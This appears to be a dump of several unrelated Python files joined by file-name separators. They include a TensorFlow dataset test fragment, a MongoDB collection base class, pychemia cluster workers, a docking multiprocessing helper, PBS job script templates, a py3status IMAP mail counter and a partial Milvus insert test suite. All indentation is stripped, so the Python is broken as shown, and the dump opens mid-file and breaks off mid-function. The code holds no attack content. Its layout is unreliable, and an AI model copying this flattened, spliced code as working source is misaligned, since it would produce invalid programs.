self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(
local_determinism=[None, True, False],
global_determinism=[True, False])))
def testDeterminismConfiguration(self, apply_map, local_determinism,
global_determinism):
expect_determinism = local_determinism or (local_determinism is None and
global_determinism)
elements = list(range(1000))
def dataset_fn(delay_ms):
def sleep(x):
time.sleep(delay_ms / 1000)
return x
def map_function(x):
if math_ops.equal(x, 0):
return script_ops.py_func(sleep, [x], x.dtype)
else:
return x
dataset = dataset_ops.Dataset.from_tensor_slices(elements)
dataset = apply_map(
dataset,
map_function,
num_parallel_calls=2,
deterministic=local_determinism)
opts = dataset_ops.Options()
opts.experimental_deterministic = global_determinism
dataset = dataset.with_options(opts)
return dataset
self.checkDeterminism(
dataset_fn, expect_determinism, expected_elements=elements)
@combinations.generate(_test_combinations())
def testNoneComponent(self, apply_map):
dataset = dataset_ops.Dataset.from_tensors((42, None))
def map_function(x, y):
if y is None:
return x / 2
return x
dataset = apply_map(dataset, map_function)
self.assertDatasetProduces(dataset, expected_output=[21])
if __name__ == "__main__":
test.main()
|
_base.py
|
"""Base class for all factorial classes."""
import os
from abc import ABC
from threading import Thread
from typing import final
from django.conf import settings
from pymongo.collection import Collection
from JellyBot.systemconfig import Database
from extutils.mongo import get_codec_options
from mixin import ClearableMixin
from models.utils import ModelFieldChecker
from mongodb.utils import backup_collection
from mongodb.factory import MONGO_CLIENT
from ._dbctrl import SINGLE_DB_NAME
from .mixin import ControlExtensionMixin
__all__ = ("BaseCollection",)
class BaseCollection(ControlExtensionMixin, ClearableMixin, Collection, ABC):
"""Base class for a collection instance."""
def __init__(self):
self._db = MONGO_CLIENT.get_database(self.get_db_name())
super().__init__(self._db, self.get_col_name(), codec_options=get_codec_options())
self.get_model_cls() # Dummy call to check if `model_class` has been defined
self.build_indexes()
self.on_init()
Thread(target=self.on_init_async).start()
@final
def on_init(self):
"""Method to be executed after all initializations completed."""
if not os.environ.get("NO_FIELD_CHECK") and not os.environ.get("TEST"):
ModelFieldChecker.check_async(self)
if settings.PRODUCTION:
backup_collection(
MONGO_CLIENT, self.get_db_name(), self.get_col_name(),
SINGLE_DB_NAME is not None, Database.BackupIntervalSeconds)
def on_init_async(self):
"""Hook method to be called asychronously on the initialization of this class."""
def build_indexes(self):
"""Method to be called when building the indexes of this collection."""
def clear(self):
self.delete_many({})
|
cluster.py
|
import time
from multiprocessing import Pool, Process
import pychemia
__author__ = 'Guillermo Avendano-Franco'
def cluster_worker(db_settings):
while True:
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is not None:
population.pcdb.lock(entry['_id'])
structure, properties, energy = population.evaluate(entry['_id'])
population.pcdb.update(entry['_id'], structure=structure, properties=properties)
population.pcdb.unlock(entry['_id'])
else:
break
def cluster_evaluator(db_settings, nparal):
pcdb = pychemia.db.get_database(db_settings)
population = pychemia.population.LJCluster(pcdb)
population.recover()
print('Staring evaluator for %s' % population.name)
while True:
entry = population.pcdb.db.pychemia_entries.find_one({'status.' + population.tag: True,
'status.lock': {'$exists': False},
'properties': {}}, {'_id': 1})
if entry is None:
time.sleep(2)
create_pool = False
else:
create_pool = True
if create_pool:
pool = Pool(processes=nparal)
pool.map(cluster_worker, nparal * [db_settings])
pool.close()
pool.join()
def cluster_launcher(db_settings, nparal):
p = Process(target=cluster_evaluator, args=(db_settings, nparal))
p.start()
return p
|
utils.py
|
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 21 23:43:31 2021
@author: o_o
"""
import multiprocessing
def count_processors(num_inputs, num_processors):
"""
Checks processors available and returns a safe number of them to
utilize.
:param int num_inputs: The number of inputs.
:param int num_processors: The number of desired processors.
:returns: The number of processors to use.
"""
# first, if num_processors<= 0, determine the number of processors to
# use programatically
if num_processors<= 0:
num_processors = multiprocessing.cpu_count()
# reduce the number of processors if too many have been specified
if num_inputs < num_processors:
num_processors = num_inputs
return num_processors
def worker(input, output):
for seq, job in iter(input.get, 'STOP'):
func, args = job
result = func(*args)
ret_val = (seq, result)
output.put(ret_val)
def start_processes(inputs, num_processors):
"""
Creates a queue of inputs and outputs
"""
# Create queues
task_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
# Submit tasks
for item in inputs:
task_queue.put(item)
# Start worker processes
for i in range(num_processors):
multiprocessing.Process(target = worker, args = (task_queue, done_queue)).start()
# Get and print results
results = []
for i in range(len(inputs)):
results.append(done_queue.get())
# Tell child processes to stop
for i in range(num_processors):
task_queue.put('STOP')
results.sort(key = lambda tup: tup[0])
return [item[1] for item in map(list, results)]
def multi_threading(inputs, num_processors, task_name):
"""Initialize this object.
Args:
inputs ([data]): A list of data. Each datum contains the details to
run a single job on a single processor.
num_processors (int): The number of processors to use.
task_class_name (class): The class that governs what to do for each
job on each processor.
"""
results = []
# If there are no inputs, just return an empty list.
if len(inputs) == 0:
return results
num_processors = count_processors(len(inputs), num_processors)
tasks = []
for index, item in enumerate(inputs):
if not isinstance(item, tuple):
item = (item,)
task = (index, (task_name, item))
tasks.append(task)
if num_processors == 1:
for item in tasks:
job, args = item[1]
output = job(*args)
results.append(output)
else:
results = start_processes(tasks, num_processors)
return results
#%%
from pathlib import Path
import os
import random
from multiprocessing import Pool
def new_out():
_id = random.randint(0,100)
return f'./out-vina-multiprocessing_{_id:0>3d}.pdbqt'
def run_dock_multithread(docking_object, out):
"""
Run the docking of a single molecule.
Inputs:
:param object docking_object: the class for running the chosen docking
method
:param str pdb: the path to the pdb of a molecule
Returns:
:returns: list failed_smiles_names: any smiles which were deleted (ie.
docking failed)
"""
print("Attempt to Dock complete: ", out)
failed_smiles_names = docking_object.run_dock(out)
return failed_smiles_names
class docking:
def run_dock(out):
ligand = Path('../../data/prepare/prepared_ligands_vina/lig_3b2x.pdbqt')
receptor = Path('../../data/prepare/prepared_receptors_vina/receptor_3b2x.pdbqt')
conf = Path('../../data/config_vina_ex1.txt')
torun = (f"vina --config {conf}\
--receptor {receptor}\
--ligand {ligand}\
--out {out}\
--cpu 1")
return os.system(torun)
# if __name__ == '__main__':
# outs = tuple([tuple([docking,new_out()]) for i in range(5)])
# run_dock_multithread(*outs[0])
# multi_threading(outs,4,run_dock_multithread)
# with Pool(5) as p:
# print(p.map(new_process, outs))
|
scripts.py
|
qscript = """
### Script for setting qsub configuration and calling Python script
### Set number of nodes: Set number of cores
#PBS -l nodes={}:ppn={}
### Set walltime
#PBS -l walltime={}
### Set amount of memory
#PBS -l mem={}
### Set CPU time ([[h:]m:]s).
#PBS -l cput={}
{}
"""
#------------------------------------------------------------------------------
pyscript = """
import subprocess
PYTHON_VERSION = {}
script = '''
import pickle
import shutil
import sys
import os
temp_dir = '{}'
try:
with open(os.path.join(temp_dir,'fnc.pkl'),'rb') as f:
fnc = pickle.loads(f.read())
with open(os.path.join(temp_dir,'args.pkl'),'rb') as f:
args = pickle.loads(f.read())
output = fnc(args)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
str(exc_type)+str(fname)+str(exc_tb.tb_lineno)
output = str(e)+str(exc_type)+str(fname)+str(exc_tb.tb_lineno)
with open(os.path.join(temp_dir,'result.pkl'),'wb') as f:
f.write(pickle.dumps(output))
'''
if PYTHON_VERSION == 2:
subprocess.call(["python2","-c",script])
else:
subprocess.call(["python3","-c",script])
"""
#------------------------------------------------------------------------------
session_pyscript = """
#-*- encoding: utf-8 -*-
import subprocess
import threading
import time
import dill
import sys
import os
PYTHON_VERSION = {}
script = '''
import importlib
import threading
import pickle
import string
import dill
import time
import sys
import os
job_dir = \"{}\"
def run_job(func_file,args_file,num):
with open(func_file,"rb") as f:
fnc = pickle.load(f)
with open(args_file,"rb") as f:
print(args_file)
myargs = pickle.load(f)
if not isinstance(myargs,list):
myargs = [myargs]
try:
output = fnc(*myargs)
except Exception as e:
output = e
with open(os.path.join(job_dir,"res"+str(num)+".pkl"),"wb") as f:
pickle.dump(output,f)
jobs = [n for n in os.listdir(job_dir) if 'fnc' in n]
print(jobs)
n_jobs = len(jobs)
for job in jobs:
print(job)
func_file = os.path.join(job_dir,job)
num = int(job.split('.')[0][-1])
args_file = os.path.join(job_dir,'args'+str(num)+'.pkl')
thread = threading.Thread(target=run_job,args=(func_file,args_file,num))
thread.daemon = False
thread.start()
while True:
finished = True
for i in range(num):
if not os.path.exists(os.path.join(job_dir,"args"+str(num)+".pkl")):
finished = False
time.sleep(1e-1)
if finished:
break
'''
if PYTHON_VERSION == 2:
subprocess.call(["python2","-c",script])
else:
subprocess.call(["python3","-c",script])
"""
|
imap.py
|
# -*- coding: utf-8 -*-
"""
Display number of unread messages from IMAP account.
Configuration parameters:
allow_urgent: display urgency on unread messages (default False)
cache_timeout: refresh interval for this module (default 60)
criterion: status of emails to check for (default 'UNSEEN')
debug: log warnings (default False)
format: display format for this module (default 'Mail: {unseen}')
hide_if_zero: hide this module when no new mail (default False)
mailbox: name of the mailbox to check (default 'INBOX')
password: login password (default None)
port: number to use (default '993')
read_timeout: timeout for read(2) syscalls (default 5)
security: login authentication method: 'ssl' or 'starttls'
(startssl needs python 3.2 or later) (default 'ssl')
server: server to connect (default None)
use_idle: use IMAP4 IDLE instead of polling; requires compatible
server; uses cache_timeout for IDLE's timeout; will auto detect
when set to None (default None)
user: login user (default None)
Format placeholders:
{unseen} number of unread emails
Color options:
color_new_mail: use color when new mail arrives, default to color_good
@author obb, girst
SAMPLE OUTPUT
{'full_text': 'Mail: 36', 'color': '#00FF00'}
"""
import imaplib
from threading import Thread
from time import sleep
from ssl import create_default_context
from socket import error as socket_error
STRING_UNAVAILABLE = 'N/A'
class Py3status:
"""
"""
# available configuration parameters
allow_urgent = False
cache_timeout = 60
criterion = 'UNSEEN'
debug = False
format = 'Mail: {unseen}'
hide_if_zero = False
mailbox = 'INBOX'
password = None
port = '993'
read_timeout = 5
security = 'ssl'
server = None
use_idle = None
user = None
class Meta:
deprecated = {
'rename': [
{
'param': 'new_mail_color',
'new': 'color_new_mail',
'msg': 'obsolete parameter use `color_new_mail`',
},
{
'param': 'imap_server',
'new': 'server',
'msg': 'obsolete parameter use `server`',
},
],
}
def post_config_hook(self):
# class variables:
self.mail_count = None
self.connection = None
self.mail_error = None # cannot throw self.py3.error from thread
self.command_tag = 0 # IMAPcommands are tagged, so responses can be matched up to requests
self.idle_thread = Thread()
if self.security not in ["ssl", "starttls"]:
raise ValueError("Unknown security protocol")
def check_mail(self):
# I -- acquire mail_count
if self.use_idle is not False:
if not self.idle_thread.is_alive():
sleep(self.read_timeout) # rate-limit thread-restarting (when network is offline)
self.idle_thread = Thread(target=self._get_mail_count)
self.idle_thread.daemon = True
self.idle_thread.start()
else:
self._get_mail_count()
response = {'cached_until': self.py3.time_in(self.cache_timeout)}
if self.mail_error is not None:
self.py3.log(self.mail_error, level=self.py3.LOG_ERROR)
self.py3.error(self.mail_error)
self.mail_error = None
# II -- format response
if self.mail_count is None:
response['color'] = self.py3.COLOR_BAD,
response['full_text'] = self.py3.safe_format(
self.format, {'unseen': STRING_UNAVAILABLE})
elif self.mail_count > 0:
response['color'] = self.py3.COLOR_NEW_MAIL or self.py3.COLOR_GOOD
if self.allow_urgent:
response['urgent'] = True
if self.mail_count == 0 and self.hide_if_zero:
response['full_text'] = ''
else:
response['full_text'] = self.py3.safe_format(self.format, {'unseen': self.mail_count})
return response
def _check_if_idle(self, connection):
supports_idle = 'IDLE' in connection.capabilities
self.use_idle = supports_idle
self.py3.log("Will use {}".format('idling' if self.use_idle else 'polling'))
if self.use_idle and not supports_idle:
self.py3.error("Server does not support IDLE")
def _connection_ssl(self):
connection = imaplib.IMAP4_SSL(self.server, int(self.port))
return connection
def _connection_starttls(self):
connection = imaplib.IMAP4(self.server, int(self.port))
connection.starttls(create_default_context())
return connection
def _connect(self):
if self.security == "ssl":
self.connection = self._connection_ssl()
elif self.security == "starttls":
self.connection = self._connection_starttls()
if self.use_idle is None:
self._check_if_idle(self.connection)
# trigger a socket.timeout if any IMAP request isn't completed in time:
self.connection.socket().settimeout(self.read_timeout)
def _disconnect(self):
try:
if self.connection is not None:
if self.connection.state is 'SELECTED':
self.connection.close()
self.connection.logout()
except:
pass
finally:
self.connection = None
def _idle(self):
"""
since imaplib doesn't support IMAP4r1 IDLE, we'll do it by hand
"""
socket = None
try:
# build a new command tag (Xnnn) as bytes:
self.command_tag = (self.command_tag + 1) % 1000
command_tag = b'X' + bytes(str(self.command_tag).zfill(3), 'ascii')
# make sure we have selected anything before idling:
directories = self.mailbox.split(',')
self.connection.select(directories[0])
socket = self.connection.socket()
# send IDLE command and check response:
socket.write(command_tag + b' IDLE\r\n')
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'IDLE' in time")
if not response.lower().startswith('+ idling'):
raise imaplib.IMAP4.abort("While initializing IDLE: " + str(response))
# wait for changes (EXISTS, EXPUNGE, etc.):
socket.settimeout(self.cache_timeout)
while True:
try:
response = socket.read(4096).decode('ascii')
if response.upper().startswith('* OK'):
continue # ignore '* OK Still here'
else:
break
except socket_error: # IDLE timed out
break
finally: # terminate IDLE command gracefully
if socket is None:
return
socket.settimeout(self.read_timeout)
socket.write(b'DONE\r\n') # important! Can't query IMAP again otherwise
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server didn't respond to 'DONE' in time")
# sometimes, more messages come in between reading and DONEing; so read them again:
if response.startswith('* '):
try:
response = socket.read(4096).decode('ascii')
except socket_error:
raise imaplib.IMAP4.abort("Server sent more continuations, but no 'DONE' ack")
expected_response = (command_tag + b' OK').decode('ascii')
if not response.lower().startswith(expected_response.lower()):
raise imaplib.IMAP4.abort("While terminating IDLE: " + response)
def _get_mail_count(self):
try:
while True:
if self.connection is None:
self._connect()
if self.connection.state is 'NONAUTH':
self.connection.login(self.user, self.password)
tmp_mail_count = 0
directories = self.mailbox.split(',')
for directory in directories:
self.connection.select(directory)
unseen_response = self.connection.search(None, self.criterion)
mails = unseen_response[1][0].split()
tmp_mail_count += len(mails)
self.mail_count = tmp_mail_count
if self.use_idle:
self.py3.update()
self._idle()
else:
return
except (socket_error, imaplib.IMAP4.abort, imaplib.IMAP4.readonly) as e:
if self.debug:
self.py3.log("Recoverable error - " + str(e), level=self.py3.LOG_WARNING)
self._disconnect()
except (imaplib.IMAP4.error, Exception) as e:
self.mail_error = "Fatal error - " + str(e)
self._disconnect()
self.mail_count = None
finally:
self.py3.update() # to propagate mail_error
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status)
|
test_insert.py
|
import copy
import threading
import pytest
from pymilvus import DataType, ParamError, BaseException
from utils import utils as ut
from common.constants import default_entity, default_entities, default_binary_entity, default_binary_entities, \
default_fields
from common.common_type import CaseLabel
from utils.util_log import test_log as log
ADD_TIMEOUT = 60
uid = "test_insert"
field_name = ut.default_float_vec_field_name
binary_field_name = ut.default_binary_vec_field_name
default_nb = ut.default_nb
row_count = ut.row_count
default_tag = ut.default_tag
default_single_query = {
"data": ut.gen_vectors(1, ut.default_dim),
"anns_field": ut.default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": 10,
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
if request.param["index_type"] in ut.index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
log.info(request.param)
return request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_empty_entity(self, connect, collection):
"""
target: test insert with empty entity list
method: set empty entity list as insert method params
expected: raises a ParamError exception
"""
entities = []
with pytest.raises(ParamError) as e:
connect.insert(collection, entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_none(self, connect, collection):
"""
target: test insert with None
method: set None as insert method params
expected: raises a ParamError
"""
entity = None
with pytest.raises(Exception) as e:
connect.insert(collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_collection_not_existed(self, connect):
"""
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: raise a BaseException
"""
collection_name = ut.gen_unique_str(uid)
with pytest.raises(BaseException) as e:
connect.insert(collection_name, default_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connect(self, dis_connect, collection):
"""
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.insert(collection, default_entities)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
"""
target: test delete collection after insert entities
method: insert entities and drop collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_flush_drop_collection(self, connect, collection):
"""
target: test drop collection after insert entities for a while
method: insert entities, sleep, and delete collection
expected: has_collection false
"""
result = connect.insert(collection, default_entity)
assert len(result.primary_keys) == 1
connect.flush([collection])
connect.drop_collection(collection)
assert connect.has_collection(collection) == False
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after entities
method: insert entities and build index
expected: no error raised
"""
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
"""
target: test build index insert after vector
method: insert entities and build index
expected: no error raised
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_search(self, connect, collection):
"""
target: test search entity after insert entity after a while
method: insert entity, sleep, and search collection
expected: no error raised
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
res = connect.search(collection, **default_single_query)
assert len(res[0]) == ut.default_top_k
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_segment_row_count(self, connect, collection):
nb = ut.default_segment_row_limit + 1
result = connect.insert(collection, ut.gen_entities(nb))
connect.flush([collection])
assert len(result.primary_keys) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [ut.default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection, use customize ids
method: create collection and insert entities in it, check the ids returned and
the collection length after entities inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [i for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
"""
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and
the collection length after vectors inserted
expected: the length of ids and the collection row count
"""
nb = insert_count
ids = [1 for i in range(nb)]
entities = ut.gen_entities(nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities)
connect.flush([id_collection])
assert len(result.primary_keys) == nb
assert result.primary_keys == ids
stats = connect.get_collection_stats(id_collection)
assert stats[row_count] == nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
"""
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = ut.gen_unique_str("test_collection")
fields = {
"fields": [ut.gen_primary_field(), filter_field, vector_field],
"auto_id": False
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = ut.gen_entities_by_fields(fields["fields"], nb, ut.default_dim, ids)
log.info(entities)
result = connect.insert(collection_name, entities)
assert result.primary_keys == ids
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_not_match(self, connect, id_collection, insert_count):
"""
target: test insert entities in collection without ids
method: create id_collection and insert entities without
expected: exception raised
"""
nb = insert_count
with pytest.raises(Exception) as e:
entities = ut.gen_entities(nb)
del entities[0]
connect.insert(id_collection, entities)
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: BaseException raised
"""
ids = [i for i in range(default_nb)]
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
connect.insert(id_collection, entities)
with pytest.raises(Exception) as e:
del entities[0]
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_not_ids(self, connect, id_collection):
"""
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
"""
entities = copy.deepcopy(default_entities)
del entities[0]
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
log.info(len(ids))
entities = copy.deepcopy(default_entities)
entities[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entities)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, id_collection):
"""
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise exception
"""
ids = [i for i in range(1, default_nb)]
log.info(len(ids))
entity = copy.deepcopy(default_entity)
entity[0]["values"] = ids
with pytest.raises(Exception) as e:
connect.insert(id_collection, entity)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
log.info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatedly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
